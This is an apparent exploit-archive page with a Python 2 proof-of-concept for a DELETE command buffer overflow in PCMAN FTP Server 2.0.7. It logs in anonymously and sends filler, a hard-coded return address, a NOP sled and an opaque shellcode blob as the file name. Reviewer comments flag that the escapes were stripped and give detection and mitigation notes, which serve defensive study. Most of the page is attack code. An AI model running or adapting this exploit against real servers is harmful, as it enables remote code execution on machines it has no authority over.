PCMAN FTP Server 2.0.7 DELETE Buffer Overflow
Posted on 02 November 2016
# Proof-of-concept client for the PCMAN FTP Server 2.0.7 DELETE buffer
# overflow named in the page title. Python 2 syntax (print statement,
# raw_input).
#
# NOTE(review): this listing was collapsed onto a single line, and the string
# literals below read 'x90', "xda..." with no escape character, so as printed
# they are plain ASCII text rather than raw bytes. The code is kept exactly as
# it appears on the page.
#
# Defender summary, from what the script shows:
#   * it logs in as 'anonymous', so a server that refuses anonymous logins
#     does not expose this path to unauthenticated clients;
#   * the whole payload travels as the argument of one delete request, more
#     than 2000 characters long; a file-name argument of that size is a
#     usable detection signal in FTP logs or network inspection;
#   * the page names no fixed version; restricting network access to the
#     service or replacing it is the mitigation available from this page.
from ftplib import FTP

# Author banner; the text states the target version (Pcmanftpd 2.0.7) and the
# tested platform (Windows 7 Enterprise x64 HUN/ENG).
print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: PCmanftpd_delete_command_remotecode_exploit_Win7_x64_HUN_ENG # Date: 2016.10.31 # Exploit Author: Greg Priest # Version: Pcmanftpd 2.0.7 # Tested on: Windows 7 Enterprise x64 HUN/ENG '''

# Target address is read interactively from the operator.
ftp_ip = raw_input("FTP server IP:")

# 2005 filler characters placed ahead of the value named `eip`.
# NOTE(review): presumably the distance to the saved return address on the
# tested build; the page does not say how the figure was derived.
overflow = 'A' * 2005

# Hard-coded four-value string followed by ten repetitions of 'x90'.
# NOTE(review): the name suggests an overwritten instruction pointer; a fixed
# value like this would tie the script to the platform named in the banner.
# Confirm against the original advisory.
eip = 'xCAx96xC9x76' + 'x90' * 10

# Opaque payload blob. The page does not describe what it does; treat it as
# untrusted content.
shellcode=(
"xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" +
"xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" +
"xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" +
"x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" +
"x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" +
"x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" +
"x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" +
"x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" +
"x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" +
"x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" +
"x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" +
"xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" +
"x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" +
"x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" +
"x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" +
"xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" +
"xa5x59x50")

# Final request argument: filler, then the `eip` string, then the payload.
remotecode = overflow + eip + shellcode

# Connect and authenticate as the anonymous user.
ftp = FTP(ftp_ip)
ftp.login('anonymous', 'hacker@hacker.net')

# Prints the bound method object itself (there are no call parentheses), not
# the server's reply to the login.
print ftp.login

# This message is printed before the delete request is sent, so it says
# nothing about the outcome.
print ''' Successfull Exploitation! '''

# ftplib's delete() issues a DELE command with `remotecode` as the file name.
FTP.delete(ftp, remotecode)